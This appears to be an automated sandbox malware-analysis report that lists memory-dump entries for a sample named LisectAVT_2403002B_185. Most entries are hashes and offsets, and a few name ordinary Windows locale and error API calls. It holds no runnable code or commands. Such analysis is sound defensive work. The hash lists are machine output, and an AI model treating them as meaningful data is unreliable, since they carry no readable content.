                                                                  • API String ID:
                                                                  • Opcode ID: 2dc922780f58d18a0f8c367567a1350603249a78d30a2e86dffb239f81000333
                                                                  • Instruction ID: 696304e67619d4596ad36331bc9e8cafa16b66c872ce2c11d88a531900a29f64
                                                                  • Opcode Fuzzy Hash: 2dc922780f58d18a0f8c367567a1350603249a78d30a2e86dffb239f81000333
                                                                  • Instruction Fuzzy Hash: B2014F72106304EFC700AF68F0297897FF0FF45360F654196D406AB745DB3A69548B91
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 95cfc9f23098393ae13fdc35755736012d7bd5002b613b1470fc344bb6697228
                                                                  • Instruction ID: c3d57aacaf65a4fd7642637cbbeac7282a3cb6b80600c32f8d2f8b3bd5c28f92
                                                                  • Opcode Fuzzy Hash: 95cfc9f23098393ae13fdc35755736012d7bd5002b613b1470fc344bb6697228
                                                                  • Instruction Fuzzy Hash: 7E01817190821DEFCB08EFB5E5199ADBFB0FF44315F1040A9D95683250EB359A55CF81
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 434e9a605b618c10c022ace81cca4af778c4d89f9b435807f8fcf36f55dfb87e
                                                                  • Instruction ID: 65d5e6c9bc7e44e557ab78eecaca3fa9edd5249f9836de01ae274d9015ca9293
                                                                  • Opcode Fuzzy Hash: 434e9a605b618c10c022ace81cca4af778c4d89f9b435807f8fcf36f55dfb87e
                                                                  • Instruction Fuzzy Hash: 40F0F635304754AFCF168B68E8549AFBFF6FB89120B14096EE049CB211CB315D01C761
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c7abeb3015ad55db570e6b50d5667ef7cf5682745dc1f36af1c5459835ce2d9a
                                                                  • Instruction ID: e8827061a73d6f822730f4e176900cf8ff6dc62a88620a9f20178902f6aa1d2b
                                                                  • Opcode Fuzzy Hash: c7abeb3015ad55db570e6b50d5667ef7cf5682745dc1f36af1c5459835ce2d9a
                                                                  • Instruction Fuzzy Hash: ECF0BE363193641FDB108A6A9C44DBBBFEDEFC9620B04407AF944C3351CAB0CC0087A0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 00f8cda34e0f5166891360744571ba8d5a59f414170c82d4f08107fc1d58a364
                                                                  • Instruction ID: fb6fd6cb5b246ae566a047181664fa67829db0d2939fb005ddf35c069abc77af
                                                                  • Opcode Fuzzy Hash: 00f8cda34e0f5166891360744571ba8d5a59f414170c82d4f08107fc1d58a364
                                                                  • Instruction Fuzzy Hash: 10F0F0352043016FD322AA69E85088BFBF6EFC226035085BED1498F725DE21AC06CBE5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1713009611.0000000003590000.00000040.00000800.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3590000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e9427377d4072cf57bdb429160a1dde617d1369ade1bab4dd7ded169e704f31d
                                                                  • Instruction ID: 16d9b5fd544dfee3eb500530a6faf3da89d7c32a1f0e1122e89b39378b178bb1
                                                                  • Opcode Fuzzy Hash: e9427377d4072cf57bdb429160a1dde617d1369ade1bab4dd7ded169e704f31d
                                                                  • Instruction Fuzzy Hash: AF012570E40209DFDB54CF68C881AAEBBB2BF48314F1486A9D404AB356D7799686CFD0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1712812732.000000000351D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0351D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_351d000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8c384e481565174a740779c2854c2c7678ead5ce889126e9c6a40a042128c5a9
                                                                  • Instruction ID: b3dff7de443a1c118919209d8dfea1b3c22703910838e2f8e6e2f48b1de9c039
                                                                  • Opcode Fuzzy Hash: 8c384e481565174a740779c2854c2c7678ead5ce889126e9c6a40a042128c5a9
                                                                  • Instruction Fuzzy Hash: E1F0E7B6600600AF9720CF0AD984C27FBA9FBC4670719C55AE84A5B612C672E842CAA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1712812732.000000000351D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0351D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_351d000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0cf3cd348f3eb3d936a48b51f9e158e0d1c73fe9733ff03a62bdb61762c437b3
                                                                  • Instruction ID: 9a70a0df6532d112ac028770ddeb136b3e04e52f1f40870030f46ea2a3b6f216
                                                                  • Opcode Fuzzy Hash: 0cf3cd348f3eb3d936a48b51f9e158e0d1c73fe9733ff03a62bdb61762c437b3
                                                                  • Instruction Fuzzy Hash: CAF037B5104A80AFD325CF12C984C63BBB9FB897607198489E88A4B222C631FC42CB70
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cadd8c5f56c8b5f40e15994960a33ec96277810af2a821182512cfee18f9e32d
                                                                  • Instruction ID: e215c53f67ace2e6f5f1fd96631cccc9f1696b05ad9ec7a3be756fcbf64a0fcb
                                                                  • Opcode Fuzzy Hash: cadd8c5f56c8b5f40e15994960a33ec96277810af2a821182512cfee18f9e32d
                                                                  • Instruction Fuzzy Hash: FBF08275700629AFDF149B59E84496FBBEAFBC8530B00052DE009C7310DB70AD4187A5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 41a083cf590e5357dfbee347a5e55f63bdb553f4ff65a610b17b338d1fbb4cf3
                                                                  • Instruction ID: dab95facd3c1346d5fe84b6ebda0a2bdb4b2f61930bf54b72a944a75d2e224ba
                                                                  • Opcode Fuzzy Hash: 41a083cf590e5357dfbee347a5e55f63bdb553f4ff65a610b17b338d1fbb4cf3
                                                                  • Instruction Fuzzy Hash: 0FF0E2797007007BD224AA29E85088BBBF6EBC1660350853DC1098F724CE31AC068BE5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1713009611.0000000003590000.00000040.00000800.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3590000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 239949724f0ab5bf421f34e7306bfec231b184f3090629c07af64ce249662db4
                                                                  • Instruction ID: 3a28939d2d1fbc60f73a6dc35875bad35531ea5c6b0db27ac1063227470462e9
                                                                  • Opcode Fuzzy Hash: 239949724f0ab5bf421f34e7306bfec231b184f3090629c07af64ce249662db4
                                                                  • Instruction Fuzzy Hash: BB01E474E0430ADFDB54DFA8C441AAEBBB1BB48310F1089A9C548EB392D7B496858BD1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cd426cfa2035be81b5958ff963c2f759171e46322ccc1bb22722656cb0a5689e
                                                                  • Instruction ID: 434483636300b7fec0dcf9f07391084ef201bac876688d8d1eac91f3e37ab557
                                                                  • Opcode Fuzzy Hash: cd426cfa2035be81b5958ff963c2f759171e46322ccc1bb22722656cb0a5689e
                                                                  • Instruction Fuzzy Hash: ACF0A0397006298FEB14D768A844EA9B7F2FFCC65171141AEE50ACB314EB30DC038B90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5c7056bde593874678f88921655b39166bb5a5b2132c6f4e0b68ebfca10b89b1
                                                                  • Instruction ID: a08b60015bb4035031a08def2331277a1a7b4bb5187c3f132d084b5115a53d9b
                                                                  • Opcode Fuzzy Hash: 5c7056bde593874678f88921655b39166bb5a5b2132c6f4e0b68ebfca10b89b1
                                                                  • Instruction Fuzzy Hash: 97F0BEB5908208DFCB24EFB8F8128A97FF0FB85221F0045AAD95993790E6319851CFD2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0d7179c83aca7b0376c3d735366ccfbdb6980c893bcbe47902b7c1c4344c09fa
                                                                  • Instruction ID: 18cd0a332cdae31c0b203c9ccd5c467fd399ea8ed8e395cefd7933f9dbba828c
                                                                  • Opcode Fuzzy Hash: 0d7179c83aca7b0376c3d735366ccfbdb6980c893bcbe47902b7c1c4344c09fa
                                                                  • Instruction Fuzzy Hash: 50F0A73154A3904FD7126B78E8755D87FA0CEC321071B02D7C4818F6A2D818084FC756
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 94b7eb43b89c15f506b098c5f61a9c3a271046fabf4fd1d9ec12dd6685de81f3
                                                                  • Instruction ID: 22f3cec755f61ce6c7c25563b20d35d549c8dc3ad8a122fde5db6b3273a9c648
                                                                  • Opcode Fuzzy Hash: 94b7eb43b89c15f506b098c5f61a9c3a271046fabf4fd1d9ec12dd6685de81f3
                                                                  • Instruction Fuzzy Hash: 11F02B767093408FC714CB76A498E9BBBE1EFC5331F24403BD909C7661DA308841C760
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 17f9a66103665f4854ede1e6b04fe340e6256cf4404051ff7c932f6d1e915f08
                                                                  • Instruction ID: 822312c9fd18222578b14ebbf4ff55e2f4fe7027764a52a83b5258d5fdbd1407
                                                                  • Opcode Fuzzy Hash: 17f9a66103665f4854ede1e6b04fe340e6256cf4404051ff7c932f6d1e915f08
                                                                  • Instruction Fuzzy Hash: B4E0C23230C3A11BCF1A927EA8308567FEADFC6120319C0BBE508C724BED518C168BA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b5921cf046e14b29530b981c884df7ed4e00a66a10121a60aa09ba5b0a2f1d55
                                                                  • Instruction ID: a60c9efcccef139364c39d7c2b86633e228116e42930098a8e609d62295ee58c
                                                                  • Opcode Fuzzy Hash: b5921cf046e14b29530b981c884df7ed4e00a66a10121a60aa09ba5b0a2f1d55
                                                                  • Instruction Fuzzy Hash: 2AE0DF3520A360EFCF022734781A4AD3FA4BB82230708018BF402877C2CE2C8A0487E6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 72f84a130167fc61295ab1505c105ea3f6fb6eb94ad0d8025ad1cc9f9ed868f3
                                                                  • Instruction ID: 19281c0ebd71aa2be0feb28f760a1738424a4b1cfa03e5f661127cef16f8d046
                                                                  • Opcode Fuzzy Hash: 72f84a130167fc61295ab1505c105ea3f6fb6eb94ad0d8025ad1cc9f9ed868f3
                                                                  • Instruction Fuzzy Hash: F4D09E52704935170D1C71BE2A35F7BE3CF9AC68B174641369A15D7745ED52CC0143E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1713009611.0000000003590000.00000040.00000800.00020000.00000000.sdmp, Offset: 03590000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_3590000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0e533c8e9a0cd74897ca3244ea8188b07a94a91a294daccd30f283c1edb94a31
                                                                  • Instruction ID: 987a27f8dd7c904c898c917a0af01768ef9077aa4cd0972bf441104cbccb9caf
                                                                  • Opcode Fuzzy Hash: 0e533c8e9a0cd74897ca3244ea8188b07a94a91a294daccd30f283c1edb94a31
                                                                  • Instruction Fuzzy Hash: 5AE04F795402005FE319DB62F852EDA77F2ABC4320B09855D90454B575CA3824578A50
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fcf7cd2c0804dd940a6801a869f13ca1bb766e5385f5c246df72c0d69b76d5c9
                                                                  • Instruction ID: 6bb9a6822c9d2c1444e7d4985736edc40490704e7f827161130e785083973f1c
                                                                  • Opcode Fuzzy Hash: fcf7cd2c0804dd940a6801a869f13ca1bb766e5385f5c246df72c0d69b76d5c9
                                                                  • Instruction Fuzzy Hash: 4BE0DFB1100604EBC704AF68F019A8ABBE4FF40360FA0814AD50627788CF3A68008BC5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f82df1dbeb826363cb8427e1d7e5826f3548b7b60cad28c747cd9dc4cb2b8d9e
                                                                  • Instruction ID: 5437e64c8b386fc8c6a59a550173d2619cc30467bc9086c9567c64f5f75c9728
                                                                  • Opcode Fuzzy Hash: f82df1dbeb826363cb8427e1d7e5826f3548b7b60cad28c747cd9dc4cb2b8d9e
                                                                  • Instruction Fuzzy Hash: AFD0A73394553127CF3C668FAC30CA9B7D8A9C4631325003ADC7FD3200C9515D4342D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a5f4cb24237eeef103e1b6170de0594b44fbe4bde202605390e8898bcb7758d3
                                                                  • Instruction ID: c3d693fb018081e822c158a04a2de42a3147618857a5bfe2a01460f1e26303de
                                                                  • Opcode Fuzzy Hash: a5f4cb24237eeef103e1b6170de0594b44fbe4bde202605390e8898bcb7758d3
                                                                  • Instruction Fuzzy Hash: EFE01A72906300EFC780AB64F05A7143BE5FB05330F9400A6D886DA781EA7D89A88F82
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2eaa29c81616602c4de5da9d4ebfc847dcebc46bcc988fd9c25e50bfd9d7529c
                                                                  • Instruction ID: 2a4cb95eda8cce7c2607c11cd4ed76aab5363755dd9409679850d3f2ff199433
                                                                  • Opcode Fuzzy Hash: 2eaa29c81616602c4de5da9d4ebfc847dcebc46bcc988fd9c25e50bfd9d7529c
                                                                  • Instruction Fuzzy Hash: 82D01735302220EBCE056B79B91A5AD3BA9FB84635B08445AE40787781DF6D9A0487D5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 22c4ff8cd19ae1febfea3a13b0a47b06b7a491b331dde498884b11a873cb6d05
                                                                  • Instruction ID: 1e04258261416f8db274bdc8b719e5e2057984d272b82d026cb183c2ac1ec48f
                                                                  • Opcode Fuzzy Hash: 22c4ff8cd19ae1febfea3a13b0a47b06b7a491b331dde498884b11a873cb6d05
                                                                  • Instruction Fuzzy Hash: A8D0A7B53011157B8204666DF41941DBBDAF7C9571300003BE50DC3340CE105C0287F5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e21623536f768eaf8b4b0ff91e00561e127f1a474b1d55e897329ba8cbdf179e
                                                                  • Instruction ID: 557c38d8b45295ed61b32f435af5482f46c22f145f47f0a46b105c389883507b
                                                                  • Opcode Fuzzy Hash: e21623536f768eaf8b4b0ff91e00561e127f1a474b1d55e897329ba8cbdf179e
                                                                  • Instruction Fuzzy Hash: 50E01772603304FBC780AB68F15AB183BE5F304330FA01064E44BDB780DA7DD9948B41
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 419f62d8f620c1a42056a355ce02c146a37222051aabe5159f73bf51da2fed87
                                                                  • Instruction ID: 8a1b6de0b1dacd23dc04c683a62f0b615d4ce351491e88f7e7689a4c9be8caaf
                                                                  • Opcode Fuzzy Hash: 419f62d8f620c1a42056a355ce02c146a37222051aabe5159f73bf51da2fed87
                                                                  • Instruction Fuzzy Hash: 8CD01770A05208DFCB04EFA4E54686EBBB5FB44211F008569D90A93380DA35AC01CFC1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1550ef0693eb41bbf80f5fa19510957fb5f2acbba960845bf116a27e130f5e4f
                                                                  • Instruction ID: 57dc014aedb887194de0d88c0751f435e6ee68c816ab042e3484d761f05fafd1
                                                                  • Opcode Fuzzy Hash: 1550ef0693eb41bbf80f5fa19510957fb5f2acbba960845bf116a27e130f5e4f
                                                                  • Instruction Fuzzy Hash: 44D0173180520EDBCB08EFA4E86B8BDBFB4FA00211F4040A9D91752680EA259906CFC1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2c984f8e430b9520c80b643f70e570eeeb14d047df4452fc41c9ec7b4243c279
                                                                  • Instruction ID: 98dc3a5101363235656db239557e4b61b288b1046f635e686505dd6e9a3fdd02
                                                                  • Opcode Fuzzy Hash: 2c984f8e430b9520c80b643f70e570eeeb14d047df4452fc41c9ec7b4243c279
                                                                  • Instruction Fuzzy Hash: 24C08C1950E3C16BDF0BD73988260D63F720E8301231884DFC0C2C8057C8154488C373
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d1ea561b4bda10ece9d78c395aac27a636555d6a47623b9da5fbd5aa439be332
                                                                  • Instruction ID: eed0b13d09f2ecd1c1f0b78d699a6136a5049e308193b3211a2e2edd5df8bb77
                                                                  • Opcode Fuzzy Hash: d1ea561b4bda10ece9d78c395aac27a636555d6a47623b9da5fbd5aa439be332
                                                                  • Instruction Fuzzy Hash: 50C08C7020030447CA0837F9E11D8383BD99BC461030204B8A90783370DE646C02E511
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 155c435e035bf6500f645db8bd290acd819e2f16eb220479b90d2630d7cb3ff4
                                                                  • Instruction ID: f35d71b29c709f20661c8888c667dee109961213d2bab88926ab327b255492b5
                                                                  • Opcode Fuzzy Hash: 155c435e035bf6500f645db8bd290acd819e2f16eb220479b90d2630d7cb3ff4
                                                                  • Instruction Fuzzy Hash: 11B0923404530C8FC20C6F79A819928BB69AB8830538004A9F80A4B6968EB6FC40CA48
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4e60bbaf9cd995ed23724808ede1d25d03d2a7c1c8d99151661194d1b931ab72
                                                                  • Instruction ID: 1d8f81187ee4c9f9f1448d68290a29191a699cbcac720771522ba72d88974b78
                                                                  • Opcode Fuzzy Hash: 4e60bbaf9cd995ed23724808ede1d25d03d2a7c1c8d99151661194d1b931ab72
                                                                  • Instruction Fuzzy Hash: 0FA00236E1C17997FF4DDE3B5E5A93A2AB757C3601304C46A5353C0144CDB494419624
                                                                  APIs
                                                                    • Part of subcall function 0048642F: GetLastError.KERNEL32(00000000,?,0048C60C), ref: 00486433
                                                                    • Part of subcall function 0048642F: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 004864D5
                                                                  • GetACP.KERNEL32(?,?,?,?,?,?,00484239,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 004919B6
                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00484239,?,?,?,00000055,?,-00000050,?,?), ref: 004919ED
                                                                  • _wcschr.LIBVCRUNTIME ref: 00491A81
                                                                  • _wcschr.LIBVCRUNTIME ref: 00491A8F
                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00491B50
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                  • String ID: utf8
                                                                  • API String ID: 4147378913-905460609
                                                                  • Opcode ID: 7ab9e16b927e9a20c7d3d31954ea61051f9fe6a879501c85ee2b864b0843f735
                                                                  • Instruction ID: 576b0c4914b6672ccbd381010a6379953be1c58be29bae5489585e5b493e18e0
                                                                  • Opcode Fuzzy Hash: 7ab9e16b927e9a20c7d3d31954ea61051f9fe6a879501c85ee2b864b0843f735
                                                                  • Instruction Fuzzy Hash: 8D71D371600203AADF24AB76CC86BAB7BA8EF45714F10047FF505D72A1EA78AD40C76D
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: __floor_pentium4
                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                  • API String ID: 4168288129-2761157908
